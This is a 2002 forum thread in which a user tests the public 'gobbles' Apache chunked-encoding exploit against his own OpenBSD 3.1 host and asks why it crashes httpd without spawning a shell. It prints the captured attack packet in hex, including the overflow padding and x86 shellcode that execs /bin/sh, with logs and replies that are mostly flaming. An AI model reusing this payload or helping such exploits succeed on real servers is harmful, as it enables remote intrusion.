Apache chunked (gobbles) exploit on OpenBSD 3.1

**slackwarelinux** · October 18th, 2002, 04:27 AM

Hey guys, just a simple question for you all. I just recently installed OpenBSD 3.1
on my home network. I obtained the apache chunked encoding vulnerability aka gobbles
from packetstorm and ran it against my OpenBSD 3.1 host from another node on my small home
network.

My attacking host is 192.168.0.1 and my OpenBSD box is 192.168.0.4

Here is the packet payload just for clarity.

192.168.0.1:1471 -> 192.168.0.4:80 TCP TTL:128 TOS:0x0 ID:8177 IpLen:20 DgmLen:44 DF
******S* Seq: 0x2602714E Ack: 0x0 Win: 0x3EBC TcpLen: 24
TCP Options (1) => MSS: 1460

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

192.168.0.4:80 -> 192.168.0.1:1471 TCP TTL:64 TOS:0x0 ID:45605 IpLen:20 DgmLen:44 DF
***A**S* Seq: 0x30F6508D Ack: 0x2602714F Win: 0x4470 TcpLen: 24
TCP Options (1) => MSS: 1460

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

192.168.0.1:1471 -> 192.168.0.4:80 TCP TTL:128 TOS:0x0 ID:8178 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x2602714F Ack: 0x30F6508E Win: 0x3EBC TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

192.168.0.1:1471 -> 192.168.0.4:80 TCP TTL:128 TOS:0x0 ID:8179 IpLen:20 DgmLen:1500 DF
***AP*** Seq: 0x2602714F Ack: 0x30F6508E Win: 0x3EBC TcpLen: 20
47 45 54 20 2F 20 48 54 54 50 2F 31 2E 31 0D 0A GET / HTTP/1.1..
48 6F 73 74 3A 20 61 70 61 63 68 65 2D 73 63 61 Host: apache-sca
6C 70 2E 63 0D 0A 58 2D 43 43 43 43 43 43 43 3A lp.c..X-CCCCCCC:
20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 89 E2 83 EC 10 6A 10 54 52 6A 00 6A 00 B8 1F A.....j.TRj.j...
00 00 00 CD 80 80 7A 01 02 75 0B 66 81 7A 02 05 ......z..u.f.z..
BF 75 03 EB 0F 90 FF 44 24 04 81 7C 24 04 00 01 .u.....D$..|$...
00 00 75 DA C7 44 24 08 00 00 00 00 B8 5A 00 00 ..u..D$......Z..
00 CD 80 FF 44 24 08 83 7C 24 08 03 75 EE 68 0B ....D$..|$..u.h.
6F 6B 0B 81 34 24 01 00 00 01 89 E2 6A 04 52 6A ok..4$......j.Rj
01 6A 00 B8 04 00 00 00 CD 80 68 2F 73 68 00 68 .j........h/sh.h
2F 62 69 6E 89 E2 31 C0 50 52 89 E1 50 51 52 50 /bin..1.PR..PQRP
B8 3B 00 00 00 CD 80 CC 0D 0A 58 2D 43 43 43 43 .;........X-CCCC
43 43 43 3A 20 41 41 41 41 41 41 41 41 41 41 41 CCC: AAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 AAAA

Now the problem is this. From the information I have gathered, this exploit should work on a default
install of OpenBSD 3.1, so im wondering why the exploit failed. I downloaded OpenBSD 3.1 from
their ftp server, so perhaps the vulnerabilty is patched? I also have 2 other questions

1. as you can see, near the end of the packet paylod, you can see the shell trying to be executed, but shouldent it be /bin/sh not /sh.h/bin? Is that just the way snort(1.8.6) saw the payload? i guess what im saying here is do i have to edit the shellcode to execute /bin/sh instead of sh.h/bin
you know, to "skript kiddie proof" it?

2. If thats not the case, is the downloadable version of 3.1 patched for this vulnerability?
its strange because OpenBSD http's reports segfaults and does indeed crash.

Here is some of the process listings and apache error messages from the vulnerable? OpenBSD box

USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND
root 17756 0.0 0.3 292 216 p0 R+ 7:32PM 0:00.00 ps -aux
www 32247 0.0 0.0 0 0 ?? ZW - 0:00.00 (httpd)
www 29974 0.0 0.0 0 0 ?? ZW - 0:00.00 (httpd)
www 25120 0.0 0.0 0 0 ?? ZW - 0:00.00 (httpd)
www 10393 0.0 0.0 0 0 ?? ZW - 0:00.00 (httpd)
root 1 0.0 0.3 344 204 ?? Is 8:33PM 0:00.04 /sbin/init
root 11321 0.0 0.6 104 368 ?? Ss 8:34PM 0:00.35 syslogd
root 31095 0.0 0.4 64 252 ?? Is 8:34PM 0:00.01 portmap
root 20679 0.0 2.0 1092 1284 ?? Ss 8:34PM 0:05.59 /usr/sbin/httpd
root 8041 0.0 0.5 52 292 ?? Is 8:34PM 0:00.01 inetd
root 29048 0.0 1.3 372 824 ?? Is 8:34PM 0:02.75 /usr/sbin/sshd
root 30762 0.0 0.6 200 376 ?? Is 8:34PM 0:00.29 cron
root 31491 0.0 0.4 36 252 ?? Is 8:34PM 0:00.00 /usr/sbin/wsmoused YES
root 256 0.0 0.6 48 412 C0 Is+ 8:34PM 0:00.11 /usr/libexec/getty Pc ttyC0
root 8241 0.0 0.6 44 408 C2 Is+ 8:34PM 0:00.02 /usr/libexec/getty Pc ttyC2
root 15543 0.0 0.6 48 412 C3 Is+ 8:34PM 0:00.02 /usr/libexec/getty Pc ttyC3
root 10110 0.0 0.6 48 412 C5 Is+ 8:34PM 0:00.02 /usr/libexec/getty Pc ttyC5
kpomeroy 27528 0.0 0.4 376 284 C1 Is+ 11:21AM 0:00.07 -sh (sh)
root 5192 0.0 1.9 428 1260 ?? S 7:30PM 0:01.87 sshd: root@ttyp0 (sshd)
root 15257 0.0 0.5 388 300 p0 Ss 7:31PM 0:00.12 -sh (sh)
www 7017 0.0 1.1 1092 720 ?? R 7:32PM 0:00.07 /usr/sbin/httpd
www 4903 0.0 0.9 1092 548 ?? S 7:32PM 0:00.06 /usr/sbin/httpd
www 24768 0.0 0.9 1092 548 ?? S 7:32PM 0:00.07 /usr/sbin/httpd
www 16385 0.0 0.9 1092 548 ?? S 7:32PM 0:00.08 /usr/sbin/httpd
www 14030 0.0 0.9 1092 548 ?? S 7:32PM 0:00.08 /usr/sbin/httpd
www 16972 0.0 0.9 1092 548 ?? S 7:32PM 0:00.09 /usr/sbin/httpd
www 13920 0.0 0.9 1092 548 ?? S 7:32PM 0:00.09 /usr/sbin/httpd
www 14357 0.0 0.9 1092 548 ?? S 7:32PM 0:00.10 /usr/sbin/httpd
www 3627 0.0 0.9 1092 548 ?? S 7:32PM 0:00.11 /usr/sbin/httpd
www 29871 0.0 0.9 1092 548 ?? S 7:32PM 0:00.11 /usr/sbin/httpd
www 14280 0.0 0.9 1092 548 ?? S 7:32PM 0:00.12 /usr/sbin/httpd
www 2937 0.0 0.0 0 0 ?? ZW - 0:00.00 (httpd)

You can see the Crashed (Zombie) httpd processes, and also here is the /usr/apache/log/error_log
and access_log

[Thu Oct 17 19:28:17 2002] [notice] child pid 9107 exit signal Segmentation fault (11)
[Thu Oct 17 19:28:17 2002] [notice] child pid 26116 exit signal Segmentation fault (11)
[Thu Oct 17 19:28:17 2002] [notice] child pid 6840 exit signal Segmentation fault (11)
[Thu Oct 17 19:28:17 2002] [notice] child pid 21560 exit signal Segmentation fault (11)
[Thu Oct 17 19:28:17 2002] [notice] child pid 30550 exit signal Segmentation fault (11)
[Thu Oct 17 19:28:17 2002] [notice] child pid 7442 exit signal Segmentation fault (11)
[Thu Oct 17 19:28:17 2002] [notice] child pid 14554 exit signal Segmentation fault (11)

as you can see httpd indeed does crash, which leads me to believe that
the 3.1 that I downloaded via ftp from openbsd.org was not patched, but anyway
I could not spawn a shell on my attacking box and I was curious as to why thats all.

Regards

kurt

***ammo*** · October 18th, 2002, 05:16 AM

Well if you downloaded from the .../OpenBSD/3.1/ dir on the ftp server you should have the plain release of 3.1 (.../OpenBSD/snapshots/ on the otherhand are "in-between releases" of -current)

As for why the exploit doesn't work (or doesn't seem to), I couldn't say for sure (it's been a while already since the exploit came out...). I haven't played with the exploit myself, but if I remember right, the gobbles exploit didn't do it for everyone: something to do with the default offset... your best bet would be to search the misc@openbsd.org archives
(http://www.sigmasoft.com/cgi-bin/wil...ields=filelist)

Ammo

**MDMAZER0** · October 22nd, 2002, 02:53 AM

I was wondering if you guys could help me compile the apache-scalp.c code, I an new to coding in unix. I've attemped the " make apache-scalp.c " but obviously more syntax is needed, & I an unfamiliar with Emacs. Can someone please walk me through compiling this code? Thanks

***Tedob1*** · October 22nd, 2002, 05:28 AM

*************
I've attemped the " make apache-scalp.c " but obviously more syntax is needed,
*************

and you expect me to think your more than just a script kiddie a wanna be at that.

***the_JinX*** · October 22nd, 2002, 11:25 AM

Well, slackwarelinux

i agree on it being /bin/sh so I think somewhere something must have gone wrong.

but I never tried ne of the packetstorm stuff myself.

**MDMAZER0** · October 22nd, 2002, 02:48 PM

gcc -c scalp.c -o ./scalp_run -Fukin A, you guys need to get laid - head over to tommys-bookmarks and cuff one off
-peace

***the_JinX*** · October 22nd, 2002, 03:02 PM

Well thanks for the advice, MDMAZER0. I personaly like thehun better

and wow you found out how to compile a c program in the unix enviroment (although I wouldn't do it as stated above, but hey, that's just me)

I've looked into the gobbles and didn't seem to get it to work, but then again, I didn't realy try.. Good luck slackwarelinux

**MDMAZER0** · October 22nd, 2002, 04:19 PM

Sorry guy - that was dirrected at Tedob1 - we need less Flameing in theses forums and more dispersal of knowledge, its a sad world when one simple question like "how can I do this..." or "I'm new to this... can you help? bla bla bla" will get you tossed in a mix. Should I bow down at your 1500 posts in awe, or your leet hacking skills? Do I claim to be a hacker or a script-kiddie ? Neither - rather I am a simply a student asking a simple question. Exploring someone else's code, in a closed enviornment for the fun of it or what ever I please. Why don't you think about some of the **** in your obviously troubled mind before it hits the key board. have a nice day.

Thread: Apache chunked (gobbles) exploit on OpenBSD 3.1

Thread Tools

Display

Apache chunked (gobbles) exploit on OpenBSD 3.1

Posting Permissions